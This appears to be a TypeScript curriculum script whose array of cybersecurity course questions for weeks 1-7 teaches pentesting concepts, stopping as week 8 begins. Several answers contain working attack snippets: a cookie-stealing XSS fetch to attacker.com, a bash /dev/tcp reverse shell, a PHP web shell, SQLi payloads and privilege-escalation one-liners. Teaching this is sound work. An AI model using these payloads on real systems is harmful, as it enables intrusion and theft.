/**
 * Surgical rewrite: cybersecurity.json mastery_questions for weeks 1-8.
 *
 * Lifts the cybersecurity path from terse "what is X?" textbook questions
 * to the elite teach-while-testing style of data-science / data-analysis.
 *
 * Each rewritten question:
 *   • Sets up a specific scenario the learner is in
 *   • Walks through reasoning + includes the answer / method inline
 *   • Closes with a "why this matters" or judgement question
 *   • Voice: senior mentor, not textbook
 *
 * Run:   npx tsx scripts/rewrite-cyber-mastery.ts
 */
import fs from "node:fs";
import path from "node:path";

const FILE = path.join(process.cwd(), "data", "roadmaps", "cybersecurity.json");

const REWRITES: Record<number, string[]> = {
  // ─── WEEK 1: How attackers actually think ─────────────────────────────────
  1: [
    "Lockheed Martin's Cyber Kill Chain has seven phases — reconnaissance, weaponization, delivery, exploitation, installation, command and control, and actions on objectives. Walk through what each phase means using a single real example: an attacker is trying to steal customer data from a small e-commerce site. In recon, they Google the company and find the lead engineer's LinkedIn. In weaponization, they craft a fake billing-dispute PDF with an embedded macro. In delivery, they email it to the engineer from a spoofed customer-support address. Continue the story through all seven phases — what does the macro do when opened, how does the attacker maintain access if the laptop is rebooted, where do they go on the network, what do they exfiltrate and how? The point is not memorising the names. It is that every breach is a sequence, and a defender who breaks any one link in that chain stops the whole attack. Where in this scenario would defences be cheapest and most effective? Hint: it is almost never the exploitation phase. It is almost always the delivery phase — phishing training, attachment filtering, and a culture of 'when in doubt, ask the sender'.",

    "Both SQL injection and XSS happen because the application treats untrusted input as code, but they target completely different layers. SQLi is server-side: the attacker's input gets concatenated into a SQL query that the database executes, so a payload like `' OR 1=1 --` in a login field can bypass authentication entirely by making the SQL evaluate as `WHERE username = '' OR 1=1 --'`. XSS is client-side: the attacker's input gets reflected into a web page and executed by another user's browser, so `<script>fetch('attacker.com/c='+document.cookie)</script>` exfiltrates the session cookie when a victim views the page. SQLi falls under OWASP A03: Injection in the 2021 Top 10. XSS also falls under A03 in the 2021 list (it was its own category, A07, in 2017). What is the single defence that prevents each at the framework level? Parameterised queries for SQLi (the database never sees the input as SQL — it stays a value), and contextual output encoding for XSS (the browser never sees the input as HTML — it stays text). Never trust input. Never inject it as code.",

    "Before you fire up Burp Suite Scanner or sqlmap, spend ten minutes manually exploring the login page — because the bugs that pay are rarely the ones a scanner finds. Test these five things by hand. (1) Submit a username with a single quote: `admin'`. If the error message contains 'SQL syntax', you have found injection without a scanner. (2) Try `admin` / `admin`, `admin` / `password`, `admin` / `admin123`. Default credentials are the number-one way real breaches start. (3) Submit an empty password — some login forms have logic bugs where empty input bypasses validation entirely. (4) Submit username `admin' --` (the SQL comment terminator) with any password. Watch the response. (5) Compare response time for a valid username with a bad password vs a non-existent username with a bad password. If valid usernames take consistently longer, you have a username enumeration bug. Why manual first? Scanners are noisy — they generate hundreds of requests that trigger rate limits and miss the subtle logic bugs a human spots in seconds.",

    "Verizon's annual Data Breach Investigations Report consistently shows that more than 80% of breaches involve credentials, misconfigurations, or human error — not zero-day exploits. Why? Attackers are economic actors. Researching a zero-day costs hundreds of thousands of dollars and burns the moment it is used (the vendor patches it). Phishing an employee for credentials costs almost nothing and works at scale. Finding a public S3 bucket someone forgot to lock down costs nothing. Misconfigurations are everywhere — every cloud account, every server, every dependency — and exploiting them requires zero technical sophistication. What does this mean for a defender? Spend 90% of your security budget on the boring stuff: MFA on every account, automated configuration audits, patching pipelines, employee phishing training, principle of least privilege. The fancy XDR/SIEM/AI-detection stack matters less than getting the basics right. Attackers follow the path of least resistance, and that path is almost never a zero-day.",

    "A CVE (Common Vulnerabilities and Exposures) is an identifier — like CVE-2024-12345 — that gives every publicly-disclosed vulnerability a unique name. CVSS (Common Vulnerability Scoring System) is a 0-10 severity score for that CVE, calculated from how exploitable and impactful the vulnerability is. An exploit is the actual code or technique that takes advantage of the vulnerability. These three are NOT the same thing: a CVE with CVSS 9.8 can be effectively unexploitable in your environment if the affected component is not reachable from the internet, the vulnerable feature is disabled, or a WAF blocks the exploit pattern. Conversely, a CVE with CVSS 4.5 can be catastrophic in your environment if it sits on your authentication service with no compensating controls. CVSS gives you the BASE risk; the environmental scoring is your job. The right way to triage CVEs in production: do not patch by CVSS rank — patch by exposure × exploitability × specific-impact-to-you. A CVSS 5 on your customer-data API is more urgent than a CVSS 9 on an internal tool three people use.",
  ],

  // ─── WEEK 2: Vuln Reports v0.2 ────────────────────────────────────────────
  2: [
    "CVSS v3.1 vector strings encode every input that goes into the final score. Walk through writing the vector for a reflected XSS vulnerability that requires user interaction, is network-accessible, and affects confidentiality and integrity but not availability. Start with the prefix `CVSS:3.1/`. Attack Vector is Network (delivered over the web) so `AV:N`. Attack Complexity is Low (no special conditions, just craft the URL) so `AC:L`. Privileges Required is None (anyone can send the link) so `PR:N`. User Interaction is Required (victim has to click) so `UI:R`. Scope is Unchanged (vulnerable and impacted component are the same browser context) so `S:U`. Confidentiality Impact is Low (attacker steals one user's data, not the system's) so `C:L`. Integrity Impact is Low (attacker modifies what one user sees) so `I:L`. Availability Impact is None: `A:N`. Full vector: `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N`. Plug it into the NIST calculator — you score about 6.1 (Medium). Could it be higher? Yes: if the XSS lands in an admin panel where it can steal admin tokens, Scope changes to `S:C` and the score jumps to 8.1 (High). The vector forces every assumption to be explicit.",

    "A vulnerability report is 'reproducible' when another competent tester can follow your steps on a clean instance of the target and observe the exact same result. That sounds obvious — but most rejected bug bounty reports fail at this. The common failure modes: (1) The reporter omits a required precondition ('I was logged in as a paid user' — but never said so). (2) The reproduction depends on a specific application state that no longer exists (a stale session token, a temporary file). (3) The reporter pastes a screenshot of the bug but no requests — the triager cannot reproduce without replaying the exact HTTP payload. (4) The reporter describes the bug in prose ('the form is vulnerable') without showing the steps. What happens to a non-reproducible report on HackerOne? It is closed as 'Not Applicable' or 'Informative' — no bounty, no points, and your report-to-bounty ratio (which signals your quality to triagers) drops. Write reproduction steps as if explaining to a junior tester who has never seen the application: include URL, browser, exact payload, expected vs actual response.",

    "Path traversal that lets you read /etc/passwd on a Linux web server means an attacker can read ARBITRARY files the web server process has access to. /etc/passwd itself is not catastrophic on modern systems (no password hashes — those are in /etc/shadow, only readable by root). But the same vulnerability typically lets you read application configuration files (database passwords), private keys (SSH, TLS), source code (revealing more vulnerabilities), and log files (session tokens, user data). The realistic impact is full source-code disclosure plus credential theft, which usually escalates to authenticated access elsewhere. CVSS-wise: Network attack vector (AV:N), Low complexity (AC:L), No privileges needed (PR:N), No user interaction (UI:N), Unchanged scope (S:U), High confidentiality impact (C:H — you read sensitive files), Low integrity impact (I:L — you might read configs that let you escalate), No availability impact (A:N). That scores about 8.6 (High). If the traversal also allows write or if it crosses a trust boundary (S:C), it goes to 9.8 Critical.",

    "Severity and Priority are not the same thing in vulnerability management. Severity describes how bad the vulnerability IS — based on its CVSS score, what it allows an attacker to do, and the impact if exploited. Priority describes how urgently YOU need to fix it — based on exposure to attackers, business criticality of the affected system, available patches, and effort to remediate. A Low severity bug can absolutely have High priority. Example: an information-disclosure bug (CVSS 3.5 — Low) that leaks internal hostnames seems benign. But if it leaks the hostname of your production database server and a public-facing app, that information is the first step in a kill chain to attack the database directly. The bug becomes High priority even though severity is Low. Conversely, a Critical-severity RCE on an internal admin tool used by three people behind a VPN can be Low priority — there is almost no exposure. Triage rule: priority = severity × exposure × business-criticality. Patching by CVSS alone is how teams burn out fixing low-impact 'critical' bugs while real risks sit in the backlog.",

    "Broken Access Control (OWASP A01) covers any flaw where the application fails to enforce 'this user is allowed to do this action on this resource'. It is the #1 category on the 2021 Top 10 because it is everywhere and easy to miss. Three concrete examples, all different from each other: (1) IDOR (Insecure Direct Object Reference) — `GET /api/invoices/1234` returns invoice 1234 to any authenticated user, even if they should only see their own. The fix: server checks that invoice 1234.user_id matches the requester's user_id. (2) Forced browsing — the admin dashboard at `/admin/users` is hidden from the navigation for non-admin users, but typing the URL directly loads it because the route handler does not check the user's role. The fix: every route handler validates the user's role at the top of the function. (3) Missing function-level access control — the API accepts `PATCH /api/users/1234 {role: admin}` from any user, escalating themselves to admin. The fix: role changes can only be made by users who already have the admin role, server-side enforced. Common pattern: every check has to be SERVER-SIDE, every request, every time. Client-side checks are UX, not security.",
  ],

  // ─── WEEK 3: TryHackMe + methodology ──────────────────────────────────────
  3: [
    "Active recon directly interacts with the target — port scans, banner grabs, web crawling — and leaves traces in the target's logs. Passive recon collects information without touching the target: Google searches, LinkedIn profiles, public Github repositories, certificate transparency logs, Shodan results. Two tools for each. Active: `nmap -sV target.com` (port scan with service version detection) and `gobuster dir -u https://target.com -w wordlist.txt` (directory bruteforce). Passive: `theharvester -d target.com -b all` (collects emails, subdomains, employee names from public sources) and `crt.sh?q=target.com` (queries certificate transparency to find subdomains the target may not even know are exposed). Why does it matter which you start with? Passive recon never tips off the target. A real pentest starts with hours of passive recon before any active scan — by the time you scan port 443, you already know the company's tech stack, three subdomain candidates, and the CTO's email address. The active scan just confirms what you already deduced.",

    "A basic web application pentest methodology has six phases. (1) Scoping: what is in scope, what is out, what evidence is required, who gets the report — this is contractual, before any testing. (2) Information gathering: passive recon, technology fingerprinting (Wappalyzer, BuiltWith), subdomain enumeration, certificate transparency, archived versions on web.archive.org. (3) Mapping: spider the application with Burp Suite, identify every endpoint, every parameter, every authentication flow, every role boundary. (4) Vulnerability identification: run scanners on the mapped surface (Burp Scanner, ZAP active scan), then manual testing of business-logic and authorisation. (5) Exploitation: confirm vulnerabilities are real by exploiting them in scope — never beyond what the rules of engagement allow. (6) Reporting: executive summary for leadership, detailed findings with reproduction steps and remediation for engineering. Time allocation in practice: scoping and recon are 25%, mapping is 15%, scanning is 10%, manual testing is 40%, reporting is 10%. The mistake juniors make is spending 70% on scanning. The bugs that pay are in manual testing of business logic.",

    "Gobuster brute-forces paths and subdomains: it takes a wordlist and tries every entry against the target, looking for non-404 responses. Use it when you need to find hidden endpoints — admin panels, backup files, old versions, API routes not in the public navigation. Nikto is a vulnerability scanner: it has a built-in database of known-vulnerable paths and misconfigurations and tells you which ones the target exposes (default credentials on /admin, /phpinfo.php, exposed .git directories, server-version-specific bugs). Use Nikto when you want a quick 'what known issues does this server have' report. They overlap but solve different problems: gobuster finds what is there, nikto identifies what is known-bad. Real workflow: run nikto first to catch the easy wins (Nessus / OpenVAS for paid alternatives), then run gobuster with a focused wordlist for the application's tech stack to find the things scanners do not know about (the developer left `/backup/database.sql.bak` exposed — no scanner has that in its rules, but gobuster with a backup-extension wordlist finds it).",

    "Given a target IP with no other information, your first three commands should be: (1) `nmap -sV -sC -p- -T4 <target>` — full TCP port scan with service version detection and default scripts. The `-p-` scans all 65,535 ports (most scanners default to top 1000 and miss everything else); `-sV` fingerprints service versions; `-sC` runs the default NSE script catalogue against each open port (catches common misconfigurations); `-T4` makes it reasonably fast. (2) `whatweb http://<target>` and `whatweb https://<target>` — identifies the tech stack of any web services found (Apache version, frameworks, CMS, JavaScript libraries). (3) `gobuster dir -u http://<target> -w /usr/share/wordlists/dirb/common.txt -x php,html,txt` — directory brute force with common extensions, finds hidden paths. Why these three? They map the attack surface fast: open ports tell you what services exist, banners tell you exact versions to research for CVEs, directory enum tells you what is hosted that you might not see in the navigation. From those outputs you have hours of follow-up — but you cannot prioritise without first knowing the surface.",

    "A reverse shell is a connection initiated FROM the target machine TO the attacker's machine. It works around inbound firewalls because most firewalls block incoming connections by default but allow outbound connections to anywhere — the target dials out, the firewall happily passes the traffic. Typical setup: attacker runs `nc -lvnp 4444` on a public-facing machine (or uses ngrok), listening on port 4444. Then exploits a vulnerability to make the target execute a command like `bash -i >& /dev/tcp/attacker-ip/4444 0>&1` — this opens a bash shell and redirects stdin/stdout/stderr to a TCP connection to the attacker. Attacker now has an interactive shell with the privileges of whatever process initiated the connection. Why does this defeat firewalls? Most enterprise networks allow outbound HTTP/HTTPS/DNS unconditionally — those become exfiltration channels. The defender's countermeasure: egress filtering (allow outbound connections only to known-good destinations), DNS monitoring (catch beaconing), and EDR that detects shell-spawning patterns regardless of network traffic.",
  ],

  // ─── WEEK 4: Burp Suite + intercepting requests ───────────────────────────
  4: [
    "IDOR (Insecure Direct Object Reference) is when the application uses a predictable identifier in a request — like an integer user ID or invoice number — without verifying that the requester is authorised to access that object. The classic HTTP request: `GET /api/invoices/1234` returns invoice 1234 to any authenticated user, even if invoice 1234 belongs to a different account. The vulnerable server-side code looks like `Invoice.find_by(id: params[:id])` — it loads the invoice by ID but never checks if the current user owns it. The fixed code: `current_user.invoices.find_by(id: params[:id])` — scopes the query to invoices the user owns. To demonstrate the bug in a Burp request: log in as user A, capture the request for their invoice (say invoice ID 5421), then change the URL to `/api/invoices/5420` and replay. If the response returns user B's invoice data, you have IDOR. IDOR is one of the highest-paying bug categories on HackerOne because it requires zero technical sophistication to exploit (just change a number) but can leak the entire database.",

    "Testing a login form for SQL injection using Burp Repeater, step by step. (1) Submit a normal login attempt with valid-looking credentials (e.g. `test@test.com / Password1`). Burp Proxy captures the request — right-click → 'Send to Repeater'. (2) In Repeater, find the username or password parameter in the request body. Modify the username from `test@test.com` to `test@test.com'` (add a single quote). Click 'Send'. Look at the response. If the response shows a 500 error or contains 'SQL syntax', 'SQLException', or similar — injection is likely. (3) Try the auth bypass payload: change the username to `' OR 1=1 --` and send. If the response is a successful login (redirect to dashboard, session cookie set), the application is vulnerable to authentication bypass via SQLi. (4) Confirm by trying a different payload: `admin' --` — comments out the password check. If you get logged in as admin, confirmed. (5) Document the exact request and response. The vulnerable backend code typically looks like `SELECT * FROM users WHERE email = '$input'` — concatenation. The fix is parameterised queries: `SELECT * FROM users WHERE email = ?` with the value passed separately.",

    "The Cookie header contains all cookies the browser is currently storing for that domain, sent on every request. Format: `Cookie: name1=value1; name2=value2; sessionid=abc123def456`. Session cookies are how the server knows who you are after login — the server gave you a random token at login and trusts every subsequent request bearing that token. Testing if a session token is predictable: (1) Log in, capture the session token from the Cookie header. (2) Log out. Log in again. Capture the new session token. Compare. If the new token differs from the old by a small predictable increment (sequential ID, timestamp, base64 of username), the tokens are predictable. (3) Generate 50 tokens by repeated logins. Run Burp Sequencer on them — Burp analyses entropy and tells you statistically whether the tokens look random. (4) Acceptable session tokens are 128+ bits of entropy from a cryptographic RNG (e.g., Python's `secrets.token_urlsafe(32)`). Predictable tokens let an attacker guess valid session IDs and hijack sessions. Real example: PHPSESSID values that were generated from the timestamp could be brute-forced in seconds.",

    "CORS (Cross-Origin Resource Sharing) is a browser security feature that controls which origins can read responses from a server when a JavaScript request comes from a different origin than the server. A 'no CORS policy' means the server sends no CORS headers — the browser then enforces the Same-Origin Policy by default, blocking cross-origin JavaScript from reading the response. This is SECURE by default — attackers cannot use JS on evil.com to read responses from bank.com. A 'misconfigured CORS policy' means the server sends overly permissive CORS headers, allowing cross-origin access where it should not. The classic misconfiguration: `Access-Control-Allow-Origin: *` combined with `Access-Control-Allow-Credentials: true`. This tells the browser 'anyone can read responses from me, with the user's cookies attached'. Now attacker.com can run JavaScript that fetches the victim's private data from bank.com using the victim's session. Equally bad: `Access-Control-Allow-Origin` set to whatever value the request's Origin header contains — effectively allowing any origin. The correct configuration: explicit allow-list of trusted origins, never use wildcard with credentials.",

    "When you intercept a request and see a JWT (JSON Web Token) in the Authorization header, check these three things first. (1) Decode the JWT — paste it into jwt.io. The first part is the header (algorithm), the second is the payload (claims). What user ID is in the payload? What role? What expiration time? If you see `\"role\": \"user\"`, it might be possible to modify to `\"role\": \"admin\"` if signature validation is weak. (2) Check the algorithm in the header. If it is `\"alg\": \"none\"`, the token is unsigned — change the payload, remove the signature, send. Many libraries used to accept this. If it is `\"alg\": \"HS256\"` (symmetric) and the server uses a guessable secret, brute-force the secret with hashcat and forge tokens. If it is `\"alg\": \"RS256\"` (asymmetric), look for the algorithm confusion attack — swap to HS256 and sign with the public key as the secret. (3) Inspect the expiration. If `exp` is missing or set to far in the future, tokens never expire — a stolen token works forever. The pattern: every JWT-related bug is either weak signing (lets you forge tokens) or weak claims (lets you elevate inside a valid token).",
  ],

  // ─── WEEK 5: Burp + ZAP — web testing workbench ───────────────────────────
  5: [
    "Passive scanning watches the traffic flowing through the proxy and analyses it for issues — missing security headers, cookies without HttpOnly, exposed version banners, information leakage in error messages. It generates ZERO new traffic to the target. Active scanning sends additional crafted requests to the target to test for vulnerabilities — fuzz parameters, attempt SQL injection, try XSS payloads, probe for path traversal. Active scanning can generate THOUSANDS of requests per endpoint. Which is safe to run against production? Only passive. Active scanning against production can: trigger rate limits and lock out real users, fill databases with junk data (injection payloads stored as records), crash applications with malformed input, accidentally exploit destructive operations (DELETE/PUT). Active scanning belongs in staging environments only. The compromise some teams make: run Burp's passive scanner against production continuously, then schedule active scans of a production-like staging environment weekly. Never scan production actively without explicit written permission from the system owner — it has been the cause of real outages and real lawsuits.",

    "The OWASP Web Security Testing Guide (WSTG) is the closest thing to a canonical reference for web pentesting. Five vulnerability categories you test in each: (1) Information Gathering — fingerprint the technology stack, find subdomains, archived versions, source code in the page. You're building a target map. (2) Configuration & Deployment Management — test for default credentials, exposed admin panels, debug endpoints (/actuator, /debug, /api-docs), security headers missing (X-Frame-Options, CSP, HSTS). (3) Identity & Authentication — username enumeration, weak password policy, brute force protection, password reset weaknesses, MFA bypass. (4) Session Management — token entropy, session fixation, logout effectiveness, cookie attributes (HttpOnly, Secure, SameSite), CSRF on state-changing requests. (5) Authorisation — IDOR, vertical privilege escalation (user → admin), horizontal privilege escalation (user A → user B), forced browsing to hidden URLs. WSTG has ten more categories — input validation, error handling, crypto, business logic, client-side, API, etc. Every professional pentest works through this list systematically. The mistake juniors make is jumping straight to 'find a bug'. Pros work the list — bugs surface when you do.",

    "Four hours to pentest a web application is a tight timebox — the allocation matters. My split: 30 minutes recon and tech fingerprinting (wappalyzer, subdomain enumeration, robots.txt, sitemap.xml, certificate transparency for related hostnames). 45 minutes mapping the application in Burp (spider every linked page, walk through every form, log out and back in to capture auth flows, list every endpoint and parameter). 30 minutes automated scanning (Burp's passive scanner during browsing, plus a targeted active scan of forms only — not the whole site). That is 1h45 of preparation. The remaining 2h15 is manual testing — testing every form for the OWASP WSTG categories: IDOR by tampering IDs, auth bypass by removing or modifying session tokens, business-logic bugs by stepping through multi-step workflows out of order, file upload bypasses if there's an upload, JWT analysis if tokens are JWT. The split is roughly 30% prep, 60% manual, 10% scanner. The reason juniors flip this to 60% scanner / 30% prep / 10% manual is they trust the scanner more than themselves. Get to the point where the scanner is just confirmation of what you already saw manually.",

    "A scanner reports 'possible SQL injection' at `/search?q=` — confirming whether it is a true positive vs false positive starts with replicating the scanner's payload in Burp Repeater. (1) Send the baseline request: `/search?q=test`. Note the response: HTTP status, content length, time. (2) Send the injection: `/search?q=test'`. Look at the response. If error message contains 'SQL syntax' or 'SQLException' — true positive, confirmed. If the response is identical to baseline — likely false positive. (3) Try a Boolean-based confirmation: `/search?q=test' AND 1=1 --` vs `/search?q=test' AND 1=2 --`. If the response is meaningfully different (different content length, different result count), the database is evaluating your injected logic — true positive. (4) Try a time-based confirmation: `/search?q=test' AND SLEEP(5) --`. If response time is 5+ seconds longer than baseline, true positive. (5) If still uncertain, run sqlmap against the parameter with `-p q --level=5 --risk=3`. The pattern: never trust a scanner's verdict — confirm with two independent techniques (error-based, Boolean-based, time-based, union-based) before writing it in a report.",

    "Burp Intruder is the tool inside Burp Suite for parameter fuzzing — you mark positions in a request, attach a payload set to each position, and Burp sends every combination. Four attack types. (1) Sniper — single payload set, one position at a time. Use when you want to test ONE parameter with MANY values (e.g., test the login username field with a list of usernames). (2) Battering Ram — single payload set, same value substituted into ALL positions simultaneously. Rare; useful when you need the same value in multiple places (e.g., username appears in URL and body). (3) Pitchfork — multiple payload sets, parallel iteration — payload-set-1[i] goes to position-1, payload-set-2[i] goes to position-2 simultaneously. Use for credential testing where you have paired username:password lists (try user1:pass1, user2:pass2, user3:pass3). (4) Cluster Bomb — multiple payload sets, CROSS-PRODUCT — every payload-1 against every payload-2. Use when you want to brute-force username AND password independently (10 users × 100 passwords = 1000 attempts, all combinations tested). Cluster Bomb is the most general and most expensive; Pitchfork is for when the pairing matters; Sniper is the default for single-parameter fuzzing.",
  ],

  // ─── WEEK 6: Exploitation — real bugs in real apps ────────────────────────
  6: [
    "A SQL injection UNION attack lets you extract data from OTHER tables by combining a second SELECT into the original query's result set. For UNION to work, three conditions must be true. (1) The injection point is in a SELECT statement (UPDATE/DELETE injections need different techniques). (2) You can append `UNION SELECT` to the query — the application returns the results of the SELECT to you (visible somewhere in the response). (3) The two SELECT statements must have the SAME NUMBER of columns and COMPATIBLE column types. Walkthrough: original query is `SELECT name, price FROM products WHERE category = '$input'`. You inject `' UNION SELECT NULL, NULL --` first to confirm two columns. The `--` comments out the closing quote so the query is valid. Then you replace NULLs with the data you want: `' UNION SELECT username, password FROM users --`. The response now shows usernames and passwords next to product names. If the column count is wrong, the database errors out — you increment until matching. If types do not match, NULL works for any type. UNION is the most efficient SQLi exfiltration technique — one request can dump entire tables.",

    "A web shell upload exploit, step by step from file upload to code execution. (1) Identify a file upload endpoint that accepts images (typically profile photo upload, document attachment). (2) Determine what file types the server checks. Many implementations check only the file extension (.jpg, .png). The bypass: rename your malicious file from `shell.php` to `shell.jpg.php` or `shell.php.jpg` depending on what the server parses. (3) Craft the web shell. Minimal PHP web shell: `<?php system($_GET['cmd']); ?>`. Save as `shell.php`. (4) Upload it. If the server validates extension only, upload succeeds. (5) The critical question: where is the file stored, and is it executable from a web URL? If `/uploads/shell.php` is reachable from the browser AND the web server executes .php files in /uploads, you have RCE. Visit `https://target.com/uploads/shell.php?cmd=id` — you get back the output of `id` running as the web server user. (6) From here, attacker upgrades to a full reverse shell, then escalates privileges. The defence is layered: validate by file content (not extension), store uploads outside the web root, serve them through an application controller that sets `Content-Type: application/octet-stream`, never execute uploaded files.",

    "Meterpreter is Metasploit's advanced post-exploitation payload — far more capable than a standard reverse shell. A standard reverse shell is essentially a remote terminal — you get a bash or cmd.exe prompt and run commands one at a time, with no built-in tooling. Meterpreter is an in-memory, encrypted, extensible agent that runs entirely in the exploited process — it never writes a file to disk, defeating most file-based antivirus. It speaks a custom protocol over the network connection that lets the attacker do high-level operations as single Meterpreter commands: `screenshot` captures the screen, `keyscan_start` begins keylogging, `hashdump` extracts password hashes from the registry, `migrate` moves the Meterpreter session into a more stable process (so killing the exploited service does not kill the session), `getsystem` attempts privilege escalation through a built-in catalog of techniques. Each of those is one command vs hours of work in a plain shell. Trade-off: Meterpreter has well-known network signatures and is detected by most EDR products in 2026. Plain reverse shells are noisier to operate but easier to obscure. Red teamers in well-defended environments increasingly use custom C2 frameworks (Sliver, Mythic, Brute Ratel) rather than Meterpreter for that reason.",

    "You exploited a vulnerability and got a low-privilege shell on a Linux box. Three Linux privilege escalation techniques. (1) Kernel exploits — find the kernel version with `uname -a`, search exploit-db for matching kernel CVEs. If the box is on an old kernel (3.x or unpatched 4.x/5.x), public exploits like Dirty COW (CVE-2016-5195) or DirtyPipe (CVE-2022-0847) often give instant root. Run `searchsploit linux kernel 4.4` to find candidates. (2) SUID misconfigurations — SUID binaries run as their owner regardless of who invokes them. `find / -perm -4000 2>/dev/null` lists every SUID binary. If any non-standard binary is SUID root (especially `find`, `nmap`, `vim`, `nano`, `cp`, `python`, `bash`) — GTFOBins (gtfobins.github.io) has a one-liner for each that escalates to root. Example: SUID `vim` → `vim -c ':!/bin/sh'` opens a root shell. (3) Cron jobs running as root — `cat /etc/crontab` and `ls -la /etc/cron.*` show scheduled root jobs. If a root-cron-job script is writable by your user, edit it to spawn a root shell on next execution. Common pattern: a root cron runs `/opt/backup.sh` every minute, and /opt is world-writable. Replace the script. Wait 60 seconds. Root.",

    "An exploit chain is when an attacker combines multiple vulnerabilities — none of which alone gives them what they want — into a sequence that achieves full compromise. Real example using publicly-disclosed CVEs: the 2021 ProxyShell chain in Microsoft Exchange. Three CVEs chained: (1) CVE-2021-34473 (Microsoft Exchange Server-Side Request Forgery) — lets an unauthenticated attacker make Exchange send HTTP requests to itself, bypassing the front-end authentication check. (2) CVE-2021-34523 (Privilege Elevation) — once past the front-end, the attacker can impersonate any Exchange user including the system mailbox 'SM_' accounts. (3) CVE-2021-31207 (Arbitrary File Write) — as a privileged user, the attacker uses Exchange's New-MailboxExportRequest cmdlet to write a web shell to the IIS web root. Outcome: unauthenticated remote attacker → web shell on the Exchange server → full domain controller compromise. None of the three CVEs alone is critical — one is auth bypass on a single endpoint, one is impersonation only after auth, one is file write only after privileged auth. Chained, they are a Critical RCE that hit thousands of organisations. The lesson: defenders cannot triage by individual CVSS scores — the chained risk is the real risk, and chains are why patching everything matters even when individual CVEs look low.",
  ],

  // ─── WEEK 7: Network and Service Pentesting ───────────────────────────────
  7: [
    "A SYN scan (`nmap -sS`) and a full connect scan (`nmap -sT`) differ in how nmap completes the TCP handshake. TCP normally goes SYN → SYN/ACK → ACK to open a connection. A SYN scan sends the initial SYN, receives SYN/ACK if the port is open or RST if closed, and then sends RST to abort instead of completing the handshake. The target's application layer never sees the connection — so the target may not log the probe. The SYN scan is faster and stealthier. A full connect scan (`-sT`) completes the three-way handshake (SYN → SYN/ACK → ACK), opens a real TCP connection, then immediately closes it. The target's application accepts the connection, logs it, and you appear in the server logs. When to use each: use `-sS` (default) when you have raw socket permissions (root/admin on the scanner machine) — it requires raw sockets to craft the SYN packets directly. Use `-sT` when you do not have raw socket access (running as a normal user) — it uses the OS's connect() system call which works without privileges. Practical: `-sS` is the default and what you use 95% of the time. `-sT` is fallback when you're in a restricted environment.",

    "Port 21 (FTP) open on a target — the first three things to test. (1) Anonymous login: `ftp <target>`, username `anonymous`, password `anonymous@` (or any email). If accepted, list files with `ls -la` — anonymous-readable FTP frequently exposes backup files, source code, configuration files. Real bug bounties have been paid for finding anonymous FTP with database backups in the root. (2) Banner grab — nmap's `-sV` already showed the version, but run `nc <target> 21` to see the raw banner. Old versions of vsftpd (specifically 2.3.4) have a backdoor (CVE-2011-2523) — connect with username ending in `:)` and a connection opens on port 6200 with root shell. ProFTPD 1.3.5 has CVE-2015-3306 — file copy gives RCE. Always identify the exact version and search exploit-db. (3) Default credentials — try `admin/admin`, `root/root`, `ftp/ftp`, and the target's company name as username with common passwords. FTP is often used for legacy file transfers and often has weak credentials that the admin team forgot existed. Bonus 4th if anonymous works: check write access — `put test.txt`. If you can upload, in combination with a web server on the same host, you may have an RCE chain (upload web shell, execute via HTTP).",

    "SMB (Server Message Block) is the file-sharing protocol used by Windows networks — file shares, printer sharing, named pipes, inter-process communication. It is historically high-risk because it was designed in the 1980s for trusted LANs, then extended into the internet era without rethinking the trust model. Several major SMB CVEs. (1) MS08-067 (CVE-2008-4250) — Server Service vulnerability that allowed remote code execution without authentication. This is the CVE that the Conficker worm used to infect 9 million Windows machines in 2008. Patched, but still found in unpatched legacy systems. (2) MS17-010 / EternalBlue (CVE-2017-0144) — SMBv1 remote code execution discovered by the NSA, leaked by the Shadow Brokers in 2017, then weaponised by WannaCry and NotPetya. Infected hundreds of thousands of machines globally including the UK NHS. Even in 2026, hospitals and industrial sites are still running SMBv1 because of legacy device dependencies. (3) PrintNightmare (CVE-2021-34527) — Print Spooler privilege escalation, related to SMB-style RPC. The defender's response: disable SMBv1 globally, require SMB signing, block port 445 at the perimeter, patch aggressively. SMB is also the protocol behind the most common Active Directory attacks (pass-the-hash, NTLM relay) — which is why AD pentesting starts with SMB.",

    "A vulnerability scanner (Nessus, OpenVAS, Qualys) automatically scans a network or system for known vulnerabilities by matching service banners, configurations, and probe responses against a database of CVEs. It is fast, thorough on known issues, and produces a report. A penetration test is a human attacker working systematically through scoping, recon, exploitation, post-exploitation, and reporting, finding chained business-logic bugs and validating exploitability. Can one replace the other? No. Scanner finds known unpatched CVEs and obvious misconfigurations — invaluable for compliance and baseline hygiene. It misses: business-logic flaws (the workflow that lets a user discount themselves to free), authorization bypasses (the IDOR that scanners cannot guess), zero-days, chained vulnerabilities, social engineering risk, physical security. A pentester finds those. Conversely, a pentest is expensive and time-bounded — a 5-day pentest cannot scan every host in a 10,000-host network for every CVE. Best practice: continuous automated scanning for known issues, periodic deep pentests for the depth scanners cannot reach. Most regulations (PCI-DSS, ISO 27001, SOC 2) explicitly require both because they solve different problems. The mistake organisations make is buying one scanner and calling it 'we have penetration testing'.",

    "A service banner is the text a service returns when you connect to it that identifies the software and often its exact version. Example: connecting to port 22 (SSH) on a fresh server returns `SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.6`. From that single line, an attacker knows: it's OpenSSH, version 8.9p1, on Ubuntu 22.04 specifically (the `3ubuntu0.6` is the distribution patch level). They can now search CVE databases for known issues in that exact version and craft targeted exploits without sending any probes that might trigger detection. Equivalent for HTTP: `Server: Apache/2.4.41 (Ubuntu)` or PHP's `X-Powered-By: PHP/7.4.3`. Service version information is the attacker's research starting point. How a defender reduces banner leakage: SSH — set `Banner /etc/issue.net` in sshd_config and put generic text in /etc/issue.net (some operators replace the banner entirely; OpenSSH does not let you fully hide the version, but you can suppress the OS info). Apache — `ServerTokens Prod` and `ServerSignature Off` in the config strip versions from the Server header and error pages. PHP — `expose_php = Off` in php.ini removes the X-Powered-By. None of these are security through obscurity in a real sense — a determined attacker can still fingerprint via behaviour. But they raise the cost of recon enough to deflect automated scanners that index the internet by banner.",
  ],

  // ─── WEEK 8: Reporting and Communication ──────────────────────────────────
  8: [
